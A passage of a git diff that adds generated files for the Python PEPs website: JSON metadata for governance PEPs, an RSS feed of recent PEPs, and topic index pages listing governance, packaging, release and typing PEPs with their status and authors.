Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8001/" + }, + "8002": { + "number": 8002, + "title": "Open Source Governance Survey", + "authors": "Barry Warsaw, \u0141ukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8002/" + }, + "8010": { + "number": 8010, + "title": "The Technical Leader Governance Model", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8010/" + }, + "8011": { + "number": 8011, + "title": "Python Governance Model Lead by Trio of Pythonistas", + "authors": "Mariatta, Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "24-Aug-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8011/" + }, + "8012": { + "number": 8012, + "title": "The Community Governance Model", + "authors": "\u0141ukasz Langa", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "03-Oct-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8012/" + }, + "8013": { + "number": 8013, + "title": "The External Council Governance Model", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "14-Sep-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8013/" + }, + "8014": { + "number": 8014, + "title": "The Commons Governance Model", + "authors": "Jack Jansen", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "16-Sep-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8014/" + }, + "8015": { + "number": 8015, + "title": "Organization of the Python community", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "governance", + "created": "04-Oct-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8015/" + }, + "8016": { + "number": 8016, + "title": "The Steering Council Model", + "authors": "Nathaniel J. 
Smith, Donald Stufft", + "discussions_to": null, + "status": "Accepted", + "type": "Informational", + "topic": "governance", + "created": "01-Nov-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8016/" + }, + "8100": { + "number": 8100, + "title": "January 2019 Steering Council election", + "authors": "Nathaniel J. Smith, Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "03-Jan-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8100/" + }, + "8101": { + "number": 8101, + "title": "2020 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "16-Nov-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8101/" + }, + "8102": { + "number": 8102, + "title": "2021 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin, Joe Carey", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "29-Oct-2020", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8102/" + }, + "8103": { + "number": 8103, + "title": "2022 Term Steering Council election", + "authors": "Ewa Jodlowska, Ee Durbin, Joe Carey", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "04-Oct-2021", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8103/" + }, + "8104": { + "number": 8104, + "title": "2023 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "08-Nov-2022", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8104/" + }, + "8105": { + "number": 8105, + "title": "2024 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "23-Oct-2023", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8105/" + }, + "8106": { + "number": 8106, + "title": "2025 Term Steering Council election", + "authors": "Ee Durbin", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "governance", + "created": "21-Oct-2024", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-8106/" + }, + "0": { + "number": 0, + "title": "Index of Python Enhancement Proposals (PEPs)", + "authors": "The PEP Editors", + "discussions_to": null, + "status": "Active", + "type": 
"Informational", + "topic": "", + "created": "13-Jul-2000", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0000/" + } +} \ No newline at end of file diff --git a/peps.rss b/peps.rss new file mode 100644 index 00000000000..2d299e96771 --- /dev/null +++ b/peps.rss @@ -0,0 +1,92 @@ + + + + Newest Python PEPs + https://peps.python.org/ + Newest Python Enhancement Proposals (PEPs): Information on new language features and some meta-information like release procedure and schedules. + + https://cyber.harvard.edu/rss/rss.html + en + Thu, 19 Dec 2024 20:05:05 GMT + + PEP 768: Safe external debugger interface for CPython + https://peps.python.org/pep-0768/ + This PEP proposes adding a zero-overhead debugging interface to CPython that allows debuggers and profilers to safely attach to running Python processes. The interface provides safe execution points for attaching debugger code without modifying the interpreter’s normal execution path or adding runtime overhead. + Pablo Galindo Salgado (pablogsal@python.org), Matt Wozniski (godlygeek@gmail.com), Ivona Stojanovic (stojanovic.i@hotmail.com) + https://peps.python.org/pep-0768/ + Mon, 25 Nov 2024 00:00:00 GMT + + + PEP 767: Annotating Read-Only Attributes + https://peps.python.org/pep-0767/ + PEP 705 introduced the typing.ReadOnly type qualifier to allow defining read-only typing.TypedDict items. + Eneg (eneg at discuss.python.org) + https://peps.python.org/pep-0767/ + Mon, 18 Nov 2024 00:00:00 GMT + + + PEP 766: Explicit Priority Choices Among Multiple Indexes + https://peps.python.org/pep-0766/ + Package resolution is a key part of the Python user experience as the means of extending Python’s core functionality. The experience of package resolution is mostly taken for granted until someone encounters a situation where the package installer does something they don’t expect. The installer behavior with multiple indexes has been a common source of unexpected behavior. Through its ubiquity, pip has long defined the standard expected behavior across other tools in the ecosystem, but Python installers are diverging with respect to how they handle multiple indexes. At the core of this divergence is whether index contents are combined before resolving distributions, or each index is handled individually in order. pip merges all indexes before matching distributions, while uv matches distributions on one index before moving on to the next. Each approach has advantages and disadvantages. This PEP aims to describe each of these behaviors, which are referred to as “version priority” and “index priority” respectively, so that community discussions and troubleshooting can share a common vocabulary, and so that tools can implement predictable behavior based on these descriptions. + Michael Sarahan (msarahan@gmail.com) + https://peps.python.org/pep-0766/ + Mon, 18 Nov 2024 00:00:00 GMT + + + PEP 765: Disallow return/break/continue that exit a finally block + https://peps.python.org/pep-0765/ + This PEP proposes to withdraw support for return, break and continue statements that break out of a finally block. This was proposed in the past by PEP 601. The current PEP is based on empirical evidence regarding the cost/benefit of this change, which did not exist at the time that PEP 601 was rejected. It also proposes a slightly different solution than that which was proposed by PEP 601. 
+ Irit Katriel (irit@python.org), Alyssa Coghlan (ncoghlan@gmail.com) + https://peps.python.org/pep-0765/ + Fri, 15 Nov 2024 00:00:00 GMT + + + PEP 763: Limiting deletions on PyPI + https://peps.python.org/pep-0763/ + We propose limiting when users can delete files, releases, and projects from PyPI. A project, release, or file may only be deleted within 72 hours of when it is uploaded to the index. From this point, users may only use the “yank” mechanism specified by PEP 592. + William Woodruff (william@yossarian.net), Alexis Challande (alexis.challande@trailofbits.com) + https://peps.python.org/pep-0763/ + Thu, 24 Oct 2024 00:00:00 GMT + + + PEP 8106: 2025 Term Steering Council election + https://peps.python.org/pep-8106/ + This document describes the schedule and other details of the 2024 election for the Python steering council, as specified in PEP 13. This is the steering council election for the 2025 term (i.e. Python 3.14). + Ee Durbin (ee@python.org) + https://peps.python.org/pep-8106/ + Mon, 21 Oct 2024 00:00:00 GMT + + + PEP 762: REPL-acing the default REPL + https://peps.python.org/pep-0762/ + One of Python’s core strengths is its interactive mode, also known as the Read-Eval-Print Loop (REPL), or the Python console, or the Python shell. This PEP describes the new implementation of this functionality written in Python. The new REPL released in Python 3.13 aims to provide modern features expected by today’s users, such as multi-line editing, syntax highlighting, custom commands, and an overall improved interactive experience. + Pablo Galindo Salgado (pablogsal@python.org), Łukasz Langa (lukasz@python.org), Lysandros Nikolaou (lisandrosnik@gmail.com), Emily Morehouse-Valcarcel (emily@python.org) + https://peps.python.org/pep-0762/ + Fri, 11 Oct 2024 00:00:00 GMT + + + PEP 777: How to Re-invent the Wheel + https://peps.python.org/pep-0777/ + The current wheel 1.0 specification was written over a decade ago, and has been extremely robust to changes in the Python packaging ecosystem. Previous efforts to improve the wheel specification were deferred to focus on other packaging specifications. Meanwhile, the use of wheels has changed dramatically in the last decade. There have been many requests for new wheel features over the years; however, a fundamental obstacle to evolving the wheel specification has been that there is no defined process for how to handle adding backwards-incompatible features to wheels. Therefore, to enable other PEPs to describe new enhancements to the wheel specification, this PEP prescribes compatibility requirements on future wheel revisions. This PEP does not specify a new wheel revision. The specification of a new wheel format (“Wheel 2.0”) is left to a future PEP. + Ethan Smith (ethan@ethanhs.me) + https://peps.python.org/pep-0777/ + Wed, 09 Oct 2024 00:00:00 GMT + + + PEP 761: Deprecating PGP signatures for CPython artifacts + https://peps.python.org/pep-0761/ + Since Python 3.11.0, CPython has provided two verifiable digital signatures for all CPython artifacts: PGP and Sigstore. + Seth Michael Larson (seth@python.org) + https://peps.python.org/pep-0761/ + Tue, 08 Oct 2024 00:00:00 GMT + + + PEP 760: No More Bare Excepts + https://peps.python.org/pep-0760/ + This PEP proposes disallowing bare except: clauses in Python’s exception-handling syntax. Currently, Python allows catching all exceptions with a bare except: clause, which can lead to overly broad exception handling and mask important errors. 
This PEP suggests requiring explicit exception types in all except clauses, promoting more precise and intentional error handling. + Pablo Galindo (pablogsal@python.org), Brett Cannon (brett@python.org) + https://peps.python.org/pep-0760/ + Wed, 02 Oct 2024 00:00:00 GMT + + + diff --git a/topic/governance/index.html b/topic/governance/index.html new file mode 100644 index 00000000000..b8d304ffc04 --- /dev/null +++ b/topic/governance/index.html @@ -0,0 +1,315 @@ + Governance PEPs | peps.python.org
Governance PEPs

Introduction

This is the index of all Python Enhancement Proposals (PEPs) labelled under the ‘Governance’ topic. This is a sub-index of PEP 0, the PEP index.


These PEPs detail Python’s governance, including governance model proposals and selection, and the results of the annual steering council elections.

Index by Category

Process and Meta-PEPs

PEP | Title | Authors
PA 13 | Python Language Governance | The Python core team and community
PA 545 | Python Documentation Translations | Julien Palard, Inada Naoki, Victor Stinner
PA 609 | Python Packaging Authority (PyPA) Governance | Dustin Ingram, Pradyun Gedam, Sumana Harihareswara
PA 729 | Typing governance process | Jelle Zijlstra, Shantanu Jain
PA 731 | C API Working Group Charter | Guido van Rossum, Petr Viktorin, Victor Stinner, Steve Dower, Irit Katriel
PA 732 | The Python Documentation Editorial Board | Joanna Jablonski
Other Informational PEPs

PEP | Title | Authors
IF 8000 | Python Language Governance Proposal Overview | Barry Warsaw
IF 8002 | Open Source Governance Survey | Barry Warsaw, Łukasz Langa, Antoine Pitrou, Doug Hellmann, Carol Willing
IA 8016 | The Steering Council Model | Nathaniel J. Smith, Donald Stufft
IF 8100 | January 2019 Steering Council election | Nathaniel J. Smith, Ee Durbin
IF 8101 | 2020 Term Steering Council election | Ewa Jodlowska, Ee Durbin
IF 8102 | 2021 Term Steering Council election | Ewa Jodlowska, Ee Durbin, Joe Carey
IF 8103 | 2022 Term Steering Council election | Ewa Jodlowska, Ee Durbin, Joe Carey
IF 8104 | 2023 Term Steering Council election | Ee Durbin
IF 8105 | 2024 Term Steering Council election | Ee Durbin
IF 8106 | 2025 Term Steering Council election | Ee Durbin
Historical Meta-PEPs and Informational PEPs

PEP | Title | Authors
PF 8001 | Python Governance Voting Process | Brett Cannon, Christian Heimes, Donald Stufft, Eric Snow, Gregory P. Smith, Łukasz Langa, Mariatta, Nathaniel J. Smith, Pablo Galindo Salgado, Raymond Hettinger, Tal Einat, Tim Peters, Zachary Ware
Rejected, Superseded, and Withdrawn PEPs

PEP | Title | Authors
IR 8010 | The Technical Leader Governance Model | Barry Warsaw
IR 8011 | Python Governance Model Lead by Trio of Pythonistas | Mariatta, Barry Warsaw
IR 8012 | The Community Governance Model | Łukasz Langa
IR 8013 | The External Council Governance Model | Steve Dower
IR 8014 | The Commons Governance Model | Jack Jansen
IR 8015 | Organization of the Python community | Victor Stinner
PEP Types Key

• I - Informational: Non-normative PEP containing background, guidelines or other information relevant to the Python ecosystem
• P - Process: Normative PEP describing or proposing a change to a Python community process, workflow or governance
• S - Standards Track: Normative PEP with a new feature for Python, implementation change for CPython or interoperability standard for the ecosystem

More info in PEP 1.

PEP Status Key

• A - Accepted: Normative proposal accepted for implementation
• A - Active: Currently valid informational guidance, or an in-use process
• D - Deferred: Inactive draft that may be taken up again at a later time
• <No letter> - Draft: Proposal under active discussion and revision
• F - Final: Accepted and implementation complete, or no longer active
• P - Provisional: Provisionally accepted but additional feedback needed
• R - Rejected: Formally declined and will not be accepted
• S - Superseded: Replaced by another succeeding PEP
• W - Withdrawn: Removed from consideration by sponsor or authors

More info in PEP 1.

\ No newline at end of file diff --git a/topic/index.html b/topic/index.html new file mode 100644 index 00000000000..c06115ec50c --- /dev/null +++ b/topic/index.html @@ -0,0 +1,109 @@ + Topic Index | peps.python.org

\ No newline at end of file
diff --git a/topic/packaging/index.html b/topic/packaging/index.html
new file mode 100644
index 00000000000..998d65a9866
--- /dev/null
+++ b/topic/packaging/index.html
@@ -0,0 +1,762 @@

Packaging PEPs | peps.python.org


Packaging PEPs


Introduction


This is the index of all Python Enhancement Proposals (PEPs) labelled under the ‘Packaging’ topic. This is a sub-index of PEP 0, the PEP index.


Packaging PEPs follow the PyPA specification update process. They are used to propose major additions or changes to the PyPA specifications. The canonical, up-to-date packaging specifications can be found on the Python Packaging Authority (PyPA) specifications page.
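The same index data is also published in machine-readable form. A short sketch of filtering it by topic follows, assuming the JSON API at https://peps.python.org/api/peps.json continues to expose "topic", "status", and "title" fields (true at the time of writing, but not a guaranteed interface):

```python
# Sketch: list Packaging PEPs from the machine-readable PEP index.
# Assumes the payload maps PEP numbers to records carrying "topic",
# "status" and "title" fields; adjust if the API changes.
import json
from urllib.request import urlopen

with urlopen("https://peps.python.org/api/peps.json") as resp:
    peps = json.load(resp)

for num, pep in sorted(peps.items(), key=lambda kv: int(kv[0])):
    if "packaging" in pep.get("topic", ""):
        print(num, pep["status"], pep["title"])
```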


Index by Category


Process and Meta-PEPs

PEP | Title | Authors
PA609 | Python Packaging Authority (PyPA) Governance | Dustin Ingram, Pradyun Gedam, Sumana Harihareswara

Provisional PEPs (provisionally accepted; interface may still change)

PEP | Title | Authors
SP639 | Improving License Clarity with Better Package Metadata | Philippe Ombredanne, C.A.M. Gerlach, Karolina Surma
SP708 | Extending the Repository API to Mitigate Dependency Confusion Attacks | Donald Stufft

Accepted PEPs (accepted; may not be implemented yet)

PEP | Title | Authors
SA458 | Secure PyPI downloads with signed repository metadata | Trishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos
SA625 | Filename of a Source Distribution | Tzu-ping Chung, Paul Moore
SA658 | Serve Distribution Metadata in the Simple Repository API | Tzu-ping Chung
SA668 | Marking Python base environments as “externally managed” | Geoffrey Thomas, Matthias Klose, Filipe Laíns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam
SA685 | Comparison of extra names for optional distribution dependencies | Brett Cannon
SA691 | JSON-based Simple API for Python Package Indexes | Donald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram
SA714 | Rename dist-info-metadata in the Simple API | Donald Stufft
SA735 | Dependency Groups in pyproject.toml | Stephen Rosen
SA753 | Uniform project URLs in core metadata | William Woodruff, Facundo Tuesca

Open PEPs (under consideration)

PEP | Title | Authors | Python Version
S480 | Surviving a Compromise of PyPI: End-to-end signing of packages | Trishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore
S694 | Upload 2.0 API for Python Package Repositories | Donald Stufft
S710 | Recording the provenance of installed packages | Fridolín Pokorný
S711 | PyBI: a standard format for distributing Python Binaries | Nathaniel J. Smith
S725 | Specifying external dependencies in pyproject.toml | Pradyun Gedam, Ralf Gommers
S739 | Static description file for build details of Python installations | Filipe Laíns | 3.14
S751 | A file format to record Python dependencies for installation reproducibility | Brett Cannon
S752 | Implicit namespaces for package repositories | Ofek Lev
P755 | Implicit namespace policy for PyPI | Ofek Lev
S759 | External Wheel Hosting | Barry Warsaw, Ethan Smith
S763 | Limiting deletions on PyPI | William Woodruff, Alexis Challande
I766 | Explicit Priority Choices Among Multiple Indexes | Michael Sarahan
S777 | How to Re-invent the Wheel | Ethan Smith

Finished PEPs (done, with a stable interface)

PEP | Title | Authors | Python Version
SF301 | Package Index and Metadata for Distutils | Richard Jones | 2.3
SF376 | Database of Installed Python Distributions | Tarek Ziadé | 2.7, 3.2
SF405 | Python Virtual Environments | Carl Meyer | 3.3
SF425 | Compatibility Tags for Built Distributions | Daniel Holth | 3.4
SF427 | The Wheel Binary Package Format 1.0 | Daniel Holth
SF440 | Version Identification and Dependency Specification | Alyssa Coghlan, Donald Stufft
SF503 | Simple Repository API | Donald Stufft
SF508 | Dependency specification for Python Software Packages | Robert Collins
SF517 | A build-system independent format for source trees | Nathaniel J. Smith, Thomas Kluyver
SF518 | Specifying Minimum Build System Requirements for Python Projects | Brett Cannon, Nathaniel J. Smith, Donald Stufft
SF527 | Removing Un(der)used file types/extensions on PyPI | Donald Stufft
SF561 | Distributing and Packaging Type Information | Ethan Smith | 3.7
SF566 | Metadata for Python Software Packages 2.1 | Dustin Ingram | 3.x
SF592 | Adding “Yank” Support to the Simple API | Donald Stufft
SF600 | Future ‘manylinux’ Platform Tags for Portable Linux Built Distributions | Nathaniel J. Smith, Thomas Kluyver
SF610 | Recording the Direct URL Origin of installed distributions | Stéphane Bidoul, Chris Jerdonek
SF621 | Storing project metadata in pyproject.toml | Brett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, Sébastien Eustace, Thomas Kluyver, Tzu-ping Chung
SF627 | Recording installed projects | Petr Viktorin
SF629 | Versioning PyPI’s Simple API | Donald Stufft
SF643 | Metadata for Package Source Distributions | Paul Moore
SF656 | Platform Tag for Linux Distributions Using Musl | Tzu-ping Chung
SF660 | Editable installs for pyproject.toml based builds (wheel based) | Daniel Holth, Stéphane Bidoul
SF700 | Additional Fields for the Simple API for Package Indexes | Paul Moore
SF715 | Disabling bdist_egg distribution uploads on PyPI | William Woodruff
SF721 | Using tarfile.data_filter for source distribution extraction | Petr Viktorin | 3.12
SF723 | Inline script metadata | Ofek Lev
SF740 | Index support for digital attestations | William Woodruff, Facundo Tuesca, Dustin Ingram
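Several of the finished PEPs above (517, 518, 621, 723) converge on pyproject.toml as the central configuration file. As a rough, self-contained illustration (the project metadata below is made up), here is a minimal file combining PEP 518's [build-system] table with PEP 621's [project] table, parsed with the standard-library tomllib:

```python
import tomllib  # stdlib TOML parser, Python 3.11+

# Hypothetical pyproject.toml: [build-system] per PEP 518,
# [project] metadata per PEP 621.
PYPROJECT = """
[build-system]
requires = ["setuptools>=68"]
build-backend = "setuptools.build_meta"

[project]
name = "example-package"
version = "0.1.0"
requires-python = ">=3.9"
dependencies = ["requests>=2.31"]
"""

meta = tomllib.loads(PYPROJECT)
print(meta["project"]["name"], meta["project"]["version"])  # example-package 0.1.0
print(meta["build-system"]["build-backend"])                # setuptools.build_meta
```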

Historical Meta-PEPs and Informational PEPs

PEP | Title | Authors
PS438 | Transitioning to release-file hosting on PyPI | Holger Krekel, Carl Meyer
PF449 | Removal of the PyPI Mirror Auto Discovery and Naming Scheme | Donald Stufft
PF464 | Removal of the PyPI Mirror Authenticity API | Donald Stufft
PF470 | Removing External Hosting Support on PyPI | Donald Stufft
PF541 | Package Index Name Retention | Łukasz Langa

Deferred PEPs (postponed pending further research or updates)

PEP | Title | Authors
ID423 | Naming conventions and recipes related to packaging | Benoit Bryon
SD491 | The Wheel Binary Package Format 1.9 | Daniel Holth

Rejected, Superseded, and Withdrawn PEPs

PEP | Title | Authors | Python Version
SS241 | Metadata for Python Software Packages | A.M. Kuchling
SW243 | Module Repository Upload Mechanism | Sean Reifschneider | 2.1
SR262 | A Database of Installed Python Packages | A.M. Kuchling
SS314 | Metadata for Python Software Packages 1.1 | A.M. Kuchling, Richard Jones | 2.5
SS345 | Metadata for Python Software Packages 1.2 | Richard Jones | 2.7
SR365 | Adding the pkg_resources module | Phillip J. Eby
SW381 | Mirroring infrastructure for PyPI | Tarek Ziadé, Martin von Löwis
SS386 | Changing the version comparison module in Distutils | Tarek Ziadé
SR390 | Static metadata for Distutils | Tarek Ziadé | 2.7, 3.2
IW396 | Module Version Numbers | Barry Warsaw
SR402 | Simplified Package Layout and Partitioning | Phillip J. Eby | 3.3
IW426 | Metadata for Python Software Packages 2.0 | Alyssa Coghlan, Daniel Holth, Donald Stufft
SR439 | Inclusion of implicit pip bootstrap in Python installation | Richard Jones | 3.4
SW459 | Standard Metadata Extensions for Python Software Packages | Alyssa Coghlan
IR496 | Environment Markers | James Polley
IS513 | A Platform Tag for Portable Linux Built Distributions | Robert T. McGibbon, Nathaniel J. Smith
SR516 | Build system abstraction for pip/conda etc | Robert Collins, Nathaniel J. Smith
IS571 | The manylinux2010 Platform Tag | Mark Williams, Geoffrey Thomas, Thomas Kluyver
SR582 | Python local packages directory | Kushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan | 3.12
IS599 | The manylinux2014 Platform Tag | Dustin Ingram
SS631 | Dependency specification in pyproject.toml based on PEP 508 | Ofek Lev
SR633 | Dependency specification in pyproject.toml using an exploded TOML table | Laurie Opperman, Arun Babu Neelicattu
SW650 | Specifying Installer Requirements for Python Projects | Vikram Jayanthi, Dustin Ingram, Brett Cannon
SR662 | Editable installs via virtual wheels | Bernát Gábor
SR665 | A file format to list Python dependencies for reproducibility of an application | Brett Cannon, Pradyun Gedam, Tzu-ping Chung
SW704 | Require virtual environments by default for package installers | Pradyun Gedam
SR722 | Dependency specification for single-file scripts | Paul Moore

\ No newline at end of file
diff --git a/topic/release/index.html b/topic/release/index.html
new file mode 100644
index 00000000000..0cccd084838
--- /dev/null
+++ b/topic/release/index.html
@@ -0,0 +1,316 @@

Release PEPs | peps.python.org


Release PEPs


Introduction


This is the index of all Python Enhancement Proposals (PEPs) labelled under the ‘Release’ topic. This is a sub-index of PEP 0, the PEP index.


A PEP is written to specify the release cycle for each feature release of Python. See the developer’s guide for more information.


Index by Category


Other Informational PEPs

PEP | Title | Authors | Python Version
IA596 | Python 3.9 Release Schedule | Łukasz Langa | 3.9
IA619 | Python 3.10 Release Schedule | Pablo Galindo Salgado | 3.10
IA664 | Python 3.11 Release Schedule | Pablo Galindo Salgado | 3.11
IA693 | Python 3.12 Release Schedule | Thomas Wouters | 3.12
IA719 | Python 3.13 Release Schedule | Thomas Wouters | 3.13
IA745 | Python 3.14 Release Schedule | Hugo van Kemenade | 3.14

Historical Meta-PEPs and Informational PEPs

PEP | Title | Authors | Python Version
IF160 | Python 1.6 Release Schedule | Fred L. Drake, Jr. | 1.6
IF200 | Python 2.0 Release Schedule | Jeremy Hylton | 2.0
IF226 | Python 2.1 Release Schedule | Jeremy Hylton | 2.1
IF251 | Python 2.2 Release Schedule | Barry Warsaw, Guido van Rossum | 2.2
IF283 | Python 2.3 Release Schedule | Guido van Rossum | 2.3
IF320 | Python 2.4 Release Schedule | Barry Warsaw, Raymond Hettinger, Anthony Baxter | 2.4
IF356 | Python 2.5 Release Schedule | Neal Norwitz, Guido van Rossum, Anthony Baxter | 2.5
IF361 | Python 2.6 and 3.0 Release Schedule | Neal Norwitz, Barry Warsaw | 2.6, 3.0
IF373 | Python 2.7 Release Schedule | Benjamin Peterson | 2.7
IF375 | Python 3.1 Release Schedule | Benjamin Peterson | 3.1
IF392 | Python 3.2 Release Schedule | Georg Brandl | 3.2
IF398 | Python 3.3 Release Schedule | Georg Brandl | 3.3
IF404 | Python 2.8 Un-release Schedule | Barry Warsaw | 2.8
IF429 | Python 3.4 Release Schedule | Larry Hastings | 3.4
IF478 | Python 3.5 Release Schedule | Larry Hastings | 3.5
IF494 | Python 3.6 Release Schedule | Ned Deily | 3.6
IF537 | Python 3.7 Release Schedule | Ned Deily | 3.7
IF569 | Python 3.8 Release Schedule | Łukasz Langa | 3.8

\ No newline at end of file
diff --git a/topic/typing/index.html b/topic/typing/index.html
new file mode 100644
index 00000000000..ceb9fcc9e0a
--- /dev/null
+++ b/topic/typing/index.html
@@ -0,0 +1,478 @@

Typing PEPs | peps.python.org


Typing PEPs


Introduction


This is the index of all Python Enhancement Proposals (PEPs) labelled under the ‘Typing’ topic. This is a sub-index of PEP 0, the PEP index.


Many recent PEPs propose changes to Python’s static type system or otherwise relate to type annotations. They are listed here for reference.
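As a quick orientation (an illustrative sample, not drawn from any single PEP), the snippet below exercises a few of the features standardised by PEPs in this index: TypedDict from PEP 589, the X | Y union syntax from PEP 604, and the type alias statement from PEP 695. It runs on Python 3.12 or later:

```python
from typing import TypedDict

class Point(TypedDict):              # PEP 589: TypedDict
    x: int
    y: int

type Vector = list[float]            # PEP 695: type alias statement (3.12+)

def norm(p: Point | None) -> float:  # PEP 604: X | Y union syntax
    if p is None:
        return 0.0
    return float((p["x"] ** 2 + p["y"] ** 2) ** 0.5)

print(norm({"x": 3, "y": 4}))        # 5.0
```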


Index by Category


Process and Meta-PEPs

PEP | Title | Authors
PA729 | Typing governance process | Jelle Zijlstra, Shantanu Jain

Other Informational PEPs

PEP | Title | Authors
IF482 | Literature Overview for Type Hints | Łukasz Langa
IF483 | The Theory of Type Hints | Guido van Rossum, Ivan Levkivskyi

Accepted PEPs (accepted; may not be implemented yet)

PEP | Title | Authors | Python Version
SA563 | Postponed Evaluation of Annotations | Łukasz Langa | 3.7
SA649 | Deferred Evaluation Of Annotations Using Descriptors | Larry Hastings | 3.14

Open PEPs (under consideration)

PEP | Title | Authors | Python Version
S718 | Subscriptable functions | James Hilton-Balfe | 3.13
S727 | Documentation in Annotated Metadata | Sebastián Ramírez | 3.13
S728 | TypedDict with Typed Extra Items | Zixuan James Li | 3.14
S746 | Type checking Annotated metadata | Adrian Garcia Badaracco | 3.14
S747 | Annotating Type Forms | David Foster, Eric Traut | 3.14
S749 | Implementing PEP 649 | Jelle Zijlstra | 3.14
S767 | Annotating Read-Only Attributes | Eneg | 3.14

Finished PEPs (done, with a stable interface)

PEP | Title | Authors | Python Version
SF484 | Type Hints | Guido van Rossum, Jukka Lehtosalo, Łukasz Langa | 3.5
SF526 | Syntax for Variable Annotations | Ryan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum | 3.6
SF544 | Protocols: Structural subtyping (static duck typing) | Ivan Levkivskyi, Jukka Lehtosalo, Łukasz Langa | 3.8
SF560 | Core support for typing module and generic types | Ivan Levkivskyi | 3.7
SF561 | Distributing and Packaging Type Information | Ethan Smith | 3.7
SF585 | Type Hinting Generics In Standard Collections | Łukasz Langa | 3.9
SF586 | Literal Types | Michael Lee, Ivan Levkivskyi, Jukka Lehtosalo | 3.8
SF589 | TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys | Jukka Lehtosalo | 3.8
SF591 | Adding a final qualifier to typing | Michael J. Sullivan, Ivan Levkivskyi | 3.8
SF593 | Flexible function and variable annotations | Till Varoquaux, Konstantin Kashin | 3.9
SF604 | Allow writing union types as X \| Y | Philippe PRADOS, Maggie Moss | 3.10
SF612 | Parameter Specification Variables | Mark Mendoza | 3.10
SF613 | Explicit Type Aliases | Shannon Zhu | 3.10
SF646 | Variadic Generics | Mark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles | 3.11
SF647 | User-Defined Type Guards | Eric Traut | 3.10
SF655 | Marking individual TypedDict items as required or potentially-missing | David Foster | 3.11
SF673 | Self Type | Pradeep Kumar Srinivasan, James Hilton-Balfe | 3.11
SF675 | Arbitrary Literal String Type | Pradeep Kumar Srinivasan, Graham Bleaney | 3.11
SF681 | Data Class Transforms | Erik De Bonte, Eric Traut | 3.11
SF688 | Making the buffer protocol accessible in Python | Jelle Zijlstra | 3.12
SF692 | Using TypedDict for more precise **kwargs typing | Franek Magiera | 3.12
